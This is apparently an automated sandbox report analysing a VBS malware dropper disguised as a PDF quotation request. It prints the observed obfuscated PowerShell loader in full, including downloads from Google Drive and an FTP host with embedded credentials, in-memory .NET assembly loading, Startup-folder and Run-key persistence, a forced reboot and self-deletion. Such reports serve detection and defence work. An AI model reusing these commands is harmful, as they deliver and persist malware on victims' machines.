                    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $qKKzc = 'Ow' + [char]66 + '9ADsAKQAgACkAIAAnAEQAMQ' + [char]66 + 'EACAARAAnACAALAAgAFgAUA' + [char]66 + 'VAHUAaAAkACAALAAgACcAaA' + [char]66 + '0AHQAcA' + [char]66 + 'zADoALwAvAHMAaQ' + [char]66 + 'tAG8Abg' + [char]66 + 'hAHMAdA' + [char]66 + 'vAGwAZQ' + [char]66 + 'yAGMAaQ' + [char]66 + '1AGMALg' + [char]66 + 'yAG8ALw' + [char]66 + 'pAG0AYQ' + [char]66 + 'nAGUAcwAvAHMAZQ' + [char]66 + 'yAHYAZQ' + [char]66 + 'yAC4AdA' + [char]66 + '4AHQAJwAgACgAIA' + [char]66 + 'dAF0AWw' + [char]66 + '0AGMAZQ' + [char]66 + 'qAGIAbw' + [char]66 + 'bACAALAAgAGwAbA' + [char]66 + '1AG4AJAAgACgAZQ' + [char]66 + 'rAG8Adg' + [char]66 + 'uAEkALgApACAAJw' + [char]66 + 'JAFYARg' + [char]66 + 'yAHAAJwAgACgAZA' + [char]66 + 'vAGgAdA' + [char]66 + 'lAE0AdA' + [char]66 + 'lAEcALgApACcAMQ' + [char]66 + 'zAHMAYQ' + [char]66 + 'sAEMALgAzAHkAcg' + [char]66 + 'hAHIAYg' + [char]66 + 'pAEwAcw' + [char]66 + 'zAGEAbA' + [char]66 + 'DACcAKA' + [char]66 + 'lAHAAeQ' + [char]66 + 'UAHQAZQ' + [char]66 + 'HAC4AKQAgAFoAYw' + [char]66 + 'CAGMAYQAkACAAKA' + [char]66 + 'kAGEAbw' + [char]66 + 'MAC4Abg' + [char]66 + 'pAGEAbQ' + [char]66 + 'vAEQAdA' + [char]66 + 'uAGUAcg' + [char]66 + 'yAHUAQwA6ADoAXQ' + [char]66 + 'uAGkAYQ' + [char]66 + 'tAG8ARA' + [char]66 + 'wAHAAQQAuAG0AZQ' + [char]66 + '0AHMAeQ' + [char]66 + 'TAFsAOwApACAAKQAgACcAQQAnACAALAAgACcAkyE6AJMhJwAgACgAZQ' + [char]66 + 'jAGEAbA' + [char]66 + 'wAGUAUgAuAGcAUw' + [char]66 + '6AEMAQg' + [char]66 + 'sACQAIAAoAGcAbg' + [char]66 + 'pAHIAdA' + [char]66 + 'TADQANg' + [char]66 + 'lAHMAYQ' + [char]66 + 'CAG0Abw' + [char]66 + 'yAEYAOgA6AF0AdA' + [char]66 + 'yAGUAdg' + [char]66 + 'uAG8AQwAuAG0AZQ' + [char]66 + '0AHMAeQ' + [char]66 + 'TAFsAIAA9ACAAWg' + [char]66 + 'jAEIAYw' + [char]66 + 'hACQAIA' + [char]66 + 'dAF0AWw' + [char]66 + 'lAHQAeQ' + [char]66 + 'CAFsAOwAnACUASQ' + [char]66 + 'oAHEAUg' + [char]66 + 'YACUAJwAgAD0AIA' + [char]66 + 'YAFAAVQ' + [char]66 + '1AGgAJAA7ACkAIA' + [char]66 + 'nAFMAeg' + [char]66 + 'DAEIAbAAkACAAKA' + [char]66 + 'nAG4AaQ' + [char]66 + 'yAHQAUw' + [char]66 + 'kAGEAbw' + [char]66 + 'sAG4Adw' + [char]66 + 'vAEQALg' + [char]66 + '0AHoAdg' + [char]66 + 'rAHEAJAAgAD0AIA' + [char]66 + 'nAFMAeg' + [char]66 + 'DAEIAbAAkADsAOA' + [char]66 + 'GAFQAVQA6ADoAXQ' + [char]66 + 'nAG4AaQ' + [char]66 + 'kAG8AYw' + [char]66 + 'uAEUALg' + [char]66 + '0AHgAZQ' + [char]66 + 'UAC4AbQ' + [char]66 + 'lAHQAcw' + [char]66 + '5AFMAWwAgAD0AIA' + [char]66 + 'nAG4AaQ' + [char]66 + 'kAG8AYw' + [char]66 + 'uAEUALg' + [char]66 + '0AHoAdg' + [char]66 + 'rAHEAJAA7ACkAdA' + [char]66 + 'uAGUAaQ' + [char]66 + 'sAEMAYg' + [char]66 + 'lAFcALg' + [char]66 + '0AGUATgAgAHQAYw' + [char]66 + 'lAGoAYg' + [char]66 + 'PAC0Adw' + [char]66 + 'lAE4AKAAgAD0AIA' + [char]66 + '0AHoAdg' + [char]66 + 'rAHEAJAA7ACkAKA' + [char]66 + 'lAHMAbw' + [char]66 + 'wAHMAaQ' + [char]66 + 'kAC4AdA' + [char]66 + '6AHYAaw' + [char]66 + 'xACQAOwApACAAJw' + [char]Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "; $JwrAL = $host.Version.Major.Equals(2) ;if ( $JwrAL ) {$uVHrT = [System.IO.Path]::GetTempPath();del ( $uVHrT + '\Upwin.msu' );$FaqoI = 'https://drive.google.com/uc?export=download&id=';$jwEmr = $env:PROCESSOR_ARCHITECTURE.Contains('64') ;if ( $jwEmr ) {$FaqoI = ($FaqoI + '1NaqdNXiGvI_q1RPkazFtMygmaqTJXu42') ;}else {$FaqoI = ($FaqoI + '1g1jmXusX9mc9VmhVrJJ2XofZ3aK_cLOt') ;};$xglvh = (New-Object Net.WebClient);$xglvh.Encoding = [System.Text.Encoding]::UTF8;$xglvh.DownloadFile($URLKB, $uVHrT + '\Upwin.msu');$MYnKZ = ('C:\Users\' + [Environment]::UserName );RiWcG = ($uVHrT + '\Upwin.msu'); powershell.exe wusa.exe RiWcG /quiet /norestart ; Copy-Item 'C:\Users\user\Desktop\Quotation request YN2024-10-07pdf.vbs' -Destination ( $MYnKZ + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup' ) -force ;powershell.exe -command 'sleep 180'; shutdown.exe /r /t 0 /f }else {[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true};[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12;$lBCzSg;$qkvzt = (New-Object Net.WebClient);$qkvzt.Encoding = [System.Text.Encoding]::UTF8;$qkvzt.Credentials = new-object System.Net.NetworkCredential((-join [char[]](100,101,115,99,107,118,98,114,97,116,49)),'developerpro21578Jp@@');$lBCzSg = $qkvzt.DownloadString( 'ftp://desckvbrat1@ftp.desckvbrat.com.br/Upcrypter/01/DLL01.txt' );$qkvzt.dispose();$qkvzt = (New-Object Net.WebClient);$qkvzt.Encoding = [System.Text.Encoding]::UTF8;$lBCzSg = $qkvzt.DownloadString( $lBCzSg );$huUPX = 'C:\Users\user\Desktop\Quotation request YN2024-10-07pdf.vbs';[Byte[]] $acBcZ = [System.Convert]::FromBase64String( $lBCzSg.Replace( '?:?' , 'A' ) );[System.AppDomain]::CurrentDomain.Load( $acBcZ ).GetType('ClassLibrary3.Class1').GetMethod( 'prFVI' ).Invoke( $null , [object[]] ( 'txt.revres/segami/or.cuicrelotsanomis//:sptth' , $huUPX , 'D D1D' ) );};"Jump to behavior
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -command ". 'C:\Users\user\AppData\Roaming\Program Rules NVIDEO\Update Drivers NVIDEO\Update Drivers NVIDEO\Update Drivers NVIDEO\nliem.ps1' ";exit
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -command ". 'C:\Users\user\AppData\Roaming\Program Rules NVIDEO\Update Drivers NVIDEO\Update Drivers NVIDEO\Update Drivers NVIDEO\nliem.ps1' ";exit
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 22_2_0041CBE1 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,22_2_0041CBE1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_00007FF848D50A98 pushad ; ret 4_2_00007FF848D50AE2
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_00007FF848D500BD pushad ; iretd 4_2_00007FF848D500C1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_00007FF848C3F482 pushad ; ret 5_2_00007FF848C3F484
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_00007FF848C3D2A5 pushad ; iretd 5_2_00007FF848C3D2A6
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_00007FF848D585BD push ebx; ret 5_2_00007FF848D585DA
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_00007FF848D5169F pushfd ; ret 5_2_00007FF848D516CA
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_00007FF848D50A97 pushad ; ret 5_2_00007FF848D50AE2
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_00007FF848D5861D push ebx; ret 5_2_00007FF848D5861A
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_00007FF848D585FA push ebx; ret 5_2_00007FF848D5861A
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_00007FF848D500BD pushad ; iretd 5_2_00007FF848D500C1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_00007FF848D5843D push ebx; ret 5_2_00007FF848D5843A
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_00007FF848D583FB push ebx; ret 5_2_00007FF848D5843A
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_00007FF848C3F482 pushad ; ret 6_2_00007FF848C3F484
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_00007FF848C3D2A5 pushad ; iretd 6_2_00007FF848C3D2A6
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_00007FF848D500BD pushad ; iretd 6_2_00007FF848D500C1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_00007FF848D50A98 pushad ; ret 6_2_00007FF848D50AE2
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_00007FF848D585AB push ebx; ret 6_2_00007FF848D585AA
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_00007FF848D5855B push ebx; ret 6_2_00007FF848D585AA
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_00007FF848D5851B push ebx; ret 6_2_00007FF848D5851A
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_00007FF848D5851B push ebx; ret 6_2_00007FF848D585AA
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_00007FF848D584FA push ebx; ret 6_2_00007FF848D5851A
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_00007FF848E258C4 push cs; ret 6_2_00007FF848E258CB
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_00007FF848D400BD pushad ; iretd 8_2_00007FF848D400C1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 13_2_00007FF848D5613C push ebp; ret 13_2_00007FF848D561D8
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 13_2_00007FF848D5814D push ebx; ret 13_2_00007FF848D5816A
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 13_2_00007FF848D58118 push ebx; ret 13_2_00007FF848D5816A
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 13_2_00007FF848D583CD push ebx; retf 0009h13_2_00007FF848D583FA
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 13_2_00007FF848D500BD pushad ; iretd 13_2_00007FF848D500C1
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 16_2_10002806 push ecx; ret 16_2_10002819
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 19_2_00007FF848D45CEC push ds; iretd 19_2_00007FF848D45CEF
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 19_2_00007FF848D400BD pushad ; iretd 19_2_00007FF848D400C1
                    Source: 13.2.powershell.exe.21a8030f208.0.raw.unpack, -.csHigh entropy of concatenated method names: '_FDD0', '_FDD1', 'fNQ3vNNDv6U0WqTxZd9', 'cyDIAkNOmObm7jGqRi4', 't3r3mSNbOwaVBSXXsKt', 'FBTuXeNcfPgojjBNS9c', 'gr6bLqNKA2Mf7CYjeeS', 'YJ6ZkcNZQGljuwdmNyV', 'F4vJZVN0sVI3L4ccWTk', 'VXJrWWNv81UZUpU6gEk'
                    Source: 13.2.powershell.exe.21a8030f208.0.raw.unpack, Class1.csHigh entropy of concatenated method names: 'LoadLibraryA', 'GetProcAddress', '_FDD0', 'Run', 'NaeVj', 'SIoarRPDr4r1ZdWrB7', 'wDwbR3iQ5FfVMyg8sc', 'sIYmqbkgG6eTiSpFY6', 'Jqs27YIlcdNIwDmSv7', 'NIyXJr8Zu7JgYf5gfb'
                    Source: 13.2.powershell.exe.21a8030f208.0.raw.unpack, MyProject.csHigh entropy of concatenated method names: 'Equals', 'GetHashCode', 'GetType', 'ToString', '_FDD0', '_FDD0', 'yd8kE0NfH8wVBwFXOjJ', 'N4eNu4N2YBQGnJOoJl3', 'rhyp8qNS20i4Pq8grwf', 'h91HQtNh6aBRjICtnf9'
                    Source: 13.2.powershell.exe.21a8030f208.0.raw.unpack, eBAeUnDesS152cY3JS.csHigh entropy of concatenated method names: 'GFEY00HgIG', 'trOYewN6Sv4lUl1fxgB', 'Js5cEFNVOp3q6iY7P1O', 'tNtx94N3ASwduUbVPKr', 'VbaF61Na11NOutaTWaq', 'c298ZdNzHxbiP4rApFo', 'xwY3k6NtfQOw585Tjle', 'oyW3aRNgtsE9FU5JOAs', 'oNXKopYL2EjmjVh1ARw'
                    Source: 13.2.powershell.exe.21af4520000.2.raw.unpack, -.csHigh entropy of concatenated method names: '_FDD0', '_FDD1', 'fNQ3vNNDv6U0WqTxZd9', 'cyDIAkNOmObm7jGqRi4', 't3r3mSNbOwaVBSXXsKt', 'FBTuXeNcfPgojjBNS9c', 'gr6bLqNKA2Mf7CYjeeS', 'YJ6ZkcNZQGljuwdmNyV', 'F4vJZVN0sVI3L4ccWTk', 'VXJrWWNv81UZUpU6gEk'
                    Source: 13.2.powershell.exe.21af4520000.2.raw.unpack, Class1.csHigh entropy of concatenated method names: 'LoadLibraryA', 'GetProcAddress', '_FDD0', 'Run', 'NaeVj', 'SIoarRPDr4r1ZdWrB7', 'wDwbR3iQ5FfVMyg8sc', 'sIYmqbkgG6eTiSpFY6', 'Jqs27YIlcdNIwDmSv7', 'NIyXJr8Zu7JgYf5gfb'
                    Source: 13.2.powershell.exe.21af4520000.2.raw.unpack, MyProject.csHigh entropy of concatenated method names: 'Equals', 'GetHashCode', 'GetType', 'ToString', '_FDD0', '_FDD0', 'yd8kE0NfH8wVBwFXOjJ', 'N4eNu4N2YBQGnJOoJl3', 'rhyp8qNS20i4Pq8grwf', 'h91HQtNh6aBRjICtnf9'
                    Source: 13.2.powershell.exe.21af4520000.2.raw.unpack, eBAeUnDesS152cY3JS.csHigh entropy of concatenated method names: 'GFEY00HgIG', 'trOYewN6Sv4lUl1fxgB', 'Js5cEFNVOp3q6iY7P1O', 'tNtx94N3ASwduUbVPKr', 'VbaF61Na11NOutaTWaq', 'c298ZdNzHxbiP4rApFo', 'xwY3k6NtfQOw585Tjle', 'oyW3aRNgtsE9FU5JOAs', 'oNXKopYL2EjmjVh1ARw'
                    Source: 19.2.powershell.exe.1f1e6baf640.0.raw.unpack, -.csHigh entropy of concatenated method names: '_FDD0', '_FDD1', 'fNQ3vNNDv6U0WqTxZd9', 'cyDIAkNOmObm7jGqRi4', 't3r3mSNbOwaVBSXXsKt', 'FBTuXeNcfPgojjBNS9c', 'gr6bLqNKA2Mf7CYjeeS', 'YJ6ZkcNZQGljuwdmNyV', 'F4vJZVN0sVI3L4ccWTk', 'VXJrWWNv81UZUpU6gEk'
                    Source: 19.2.powershell.exe.1f1e6baf640.0.raw.unpack, Class1.csHigh entropy of concatenated method names: 'LoadLibraryA', 'GetProcAddress', '_FDD0', 'Run', 'NaeVj', 'SIoarRPDr4r1ZdWrB7', 'wDwbR3iQ5FfVMyg8sc', 'sIYmqbkgG6eTiSpFY6', 'Jqs27YIlcdNIwDmSv7', 'NIyXJr8Zu7JgYf5gfb'
                    Source: 19.2.powershell.exe.1f1e6baf640.0.raw.unpack, MyProject.csHigh entropy of concatenated method names: 'Equals', 'GetHashCode', 'GetType', 'ToString', '_FDD0', '_FDD0', 'yd8kE0NfH8wVBwFXOjJ', 'N4eNu4N2YBQGnJOoJl3', 'rhyp8qNS20i4Pq8grwf', 'h91HQtNh6aBRjICtnf9'
                    Source: 19.2.powershell.exe.1f1e6baf640.0.raw.unpack, eBAeUnDesS152cY3JS.csHigh entropy of concatenated method names: 'GFEY00HgIG', 'trOYewN6Sv4lUl1fxgB', 'Js5cEFNVOp3q6iY7P1O', 'tNtx94N3ASwduUbVPKr', 'VbaF61Na11NOutaTWaq', 'c298ZdNzHxbiP4rApFo', 'xwY3k6NtfQOw585Tjle', 'oyW3aRNgtsE9FU5JOAs', 'oNXKopYL2EjmjVh1ARw'
                    Source: 25.2.powershell.exe.1650030d8e0.0.raw.unpack, -.csHigh entropy of concatenated method names: '_FDD0', '_FDD1', 'fNQ3vNNDv6U0WqTxZd9', 'cyDIAkNOmObm7jGqRi4', 't3r3mSNbOwaVBSXXsKt', 'FBTuXeNcfPgojjBNS9c', 'gr6bLqNKA2Mf7CYjeeS', 'YJ6ZkcNZQGljuwdmNyV', 'F4vJZVN0sVI3L4ccWTk', 'VXJrWWNv81UZUpU6gEk'
                    Source: 25.2.powershell.exe.1650030d8e0.0.raw.unpack, Class1.csHigh entropy of concatenated method names: 'LoadLibraryA', 'GetProcAddress', '_FDD0', 'Run', 'NaeVj', 'SIoarRPDr4r1ZdWrB7', 'wDwbR3iQ5FfVMyg8sc', 'sIYmqbkgG6eTiSpFY6', 'Jqs27YIlcdNIwDmSv7', 'NIyXJr8Zu7JgYf5gfb'
                    Source: 25.2.powershell.exe.1650030d8e0.0.raw.unpack, MyProject.csHigh entropy of concatenated method names: 'Equals', 'GetHashCode', 'GetType', 'ToString', '_FDD0', '_FDD0', 'yd8kE0NfH8wVBwFXOjJ', 'N4eNu4N2YBQGnJOoJl3', 'rhyp8qNS20i4Pq8grwf', 'h91HQtNh6aBRjICtnf9'
                    Source: 25.2.powershell.exe.1650030d8e0.0.raw.unpack, eBAeUnDesS152cY3JS.csHigh entropy of concatenated method names: 'GFEY00HgIG', 'trOYewN6Sv4lUl1fxgB', 'Js5cEFNVOp3q6iY7P1O', 'tNtx94N3ASwduUbVPKr', 'VbaF61Na11NOutaTWaq', 'c298ZdNzHxbiP4rApFo', 'xwY3k6NtfQOw585Tjle', 'oyW3aRNgtsE9FU5JOAs', 'oNXKopYL2EjmjVh1ARw'

                    Persistence and Installation Behavior

                    barindex
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "; $JwrAL = $host.Version.Major.Equals(2) ;if ( $JwrAL ) {$uVHrT = [System.IO.Path]::GetTempPath();del ( $uVHrT + '\Upwin.msu' );$FaqoI = 'https://drive.google.com/uc?export=download&id=';$jwEmr = $env:PROCESSOR_ARCHITECTURE.Contains('64') ;if ( $jwEmr ) {$FaqoI = ($FaqoI + '1NaqdNXiGvI_q1RPkazFtMygmaqTJXu42') ;}else {$FaqoI = ($FaqoI + '1g1jmXusX9mc9VmhVrJJ2XofZ3aK_cLOt') ;};$xglvh = (New-Object Net.WebClient);$xglvh.Encoding = [System.Text.Encoding]::UTF8;$xglvh.DownloadFile($URLKB, $uVHrT + '\Upwin.msu');$MYnKZ = ('C:\Users\' + [Environment]::UserName );RiWcG = ($uVHrT + '\Upwin.msu'); powershell.exe wusa.exe RiWcG /quiet /norestart ; Copy-Item 'C:\Users\user\Desktop\Quotation request YN2024-10-07pdf.vbs' -Destination ( $MYnKZ + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup' ) -force ;powershell.exe -command 'sleep 180'; shutdown.exe /r /t 0 /f }else {[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true};[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12;$lBCzSg;$qkvzt = (New-Object Net.WebClient);$qkvzt.Encoding = [System.Text.Encoding]::UTF8;$qkvzt.Credentials = new-object System.Net.NetworkCredential((-join [char[]](100,101,115,99,107,118,98,114,97,116,49)),'developerpro21578Jp@@');$lBCzSg = $qkvzt.DownloadString( 'ftp://desckvbrat1@ftp.desckvbrat.com.br/Upcrypter/01/DLL01.txt' );$qkvzt.dispose();$qkvzt = (New-Object Net.WebClient);$qkvzt.Encoding = [System.Text.Encoding]::UTF8;$lBCzSg = $qkvzt.DownloadString( $lBCzSg );$huUPX = 'C:\Users\user\Desktop\Quotation request YN2024-10-07pdf.vbs';[Byte[]] $acBcZ = [System.Convert]::FromBase64String( $lBCzSg.Replace( '?:?' , 'A' ) );[System.AppDomain]::CurrentDomain.Load( $acBcZ ).GetType('ClassLibrary3.Class1').GetMethod( 'prFVI' ).Invoke( $null , [object[]] ( 'txt.revres/segami/or.cuicrelotsanomis//:sptth' , $huUPX , 'D D1D' ) );};"
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "; $JwrAL = $host.Version.Major.Equals(2) ;if ( $JwrAL ) {$uVHrT = [System.IO.Path]::GetTempPath();del ( $uVHrT + '\Upwin.msu' );$FaqoI = 'https://drive.google.com/uc?export=download&id=';$jwEmr = $env:PROCESSOR_ARCHITECTURE.Contains('64') ;if ( $jwEmr ) {$FaqoI = ($FaqoI + '1NaqdNXiGvI_q1RPkazFtMygmaqTJXu42') ;}else {$FaqoI = ($FaqoI + '1g1jmXusX9mc9VmhVrJJ2XofZ3aK_cLOt') ;};$xglvh = (New-Object Net.WebClient);$xglvh.Encoding = [System.Text.Encoding]::UTF8;$xglvh.DownloadFile($URLKB, $uVHrT + '\Upwin.msu');$MYnKZ = ('C:\Users\' + [Environment]::UserName );RiWcG = ($uVHrT + '\Upwin.msu'); powershell.exe wusa.exe RiWcG /quiet /norestart ; Copy-Item 'C:\Users\user\Desktop\Quotation request YN2024-10-07pdf.vbs' -Destination ( $MYnKZ + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup' ) -force ;powershell.exe -command 'sleep 180'; shutdown.exe /r /t 0 /f }else {[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true};[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12;$lBCzSg;$qkvzt = (New-Object Net.WebClient);$qkvzt.Encoding = [System.Text.Encoding]::UTF8;$qkvzt.Credentials = new-object System.Net.NetworkCredential((-join [char[]](100,101,115,99,107,118,98,114,97,116,49)),'developerpro21578Jp@@');$lBCzSg = $qkvzt.DownloadString( 'ftp://desckvbrat1@ftp.desckvbrat.com.br/Upcrypter/01/DLL01.txt' );$qkvzt.dispose();$qkvzt = (New-Object Net.WebClient);$qkvzt.Encoding = [System.Text.Encoding]::UTF8;$lBCzSg = $qkvzt.DownloadString( $lBCzSg );$huUPX = 'C:\Users\user\Desktop\Quotation request YN2024-10-07pdf.vbs';[Byte[]] $acBcZ = [System.Convert]::FromBase64String( $lBCzSg.Replace( '?:?' , 'A' ) );[System.AppDomain]::CurrentDomain.Load( $acBcZ ).GetType('ClassLibrary3.Class1').GetMethod( 'prFVI' ).Invoke( $null , [object[]] ( 'txt.revres/segami/or.cuicrelotsanomis//:sptth' , $huUPX , 'D D1D' ) );};"Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 22_2_00406EEB ShellExecuteW,URLDownloadToFileW,22_2_00406EEB

                    Boot Survival

                    barindex
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Update Drivers NVIDEO_khx cmd.exe /c start /min "" Powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -command ". 'C:\Users\user\AppData\Roaming\Program Rules NVIDEO\Update Drivers NVIDEO\Update Drivers NVIDEO\Update Drivers NVIDEO\nliem.ps1' ";exitJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 22_2_0041AADB OpenSCManagerW,OpenServiceW,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,22_2_0041AADB
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Update Drivers NVIDEO_khxJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Update Drivers NVIDEO_khxJump to behavior

                    Hooking and other Techniques for Hiding and Protection

                    barindex
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: cmd.exe /c del "C:\Users\user\Desktop\Quotation request YN2024-10-07pdf.vbs"
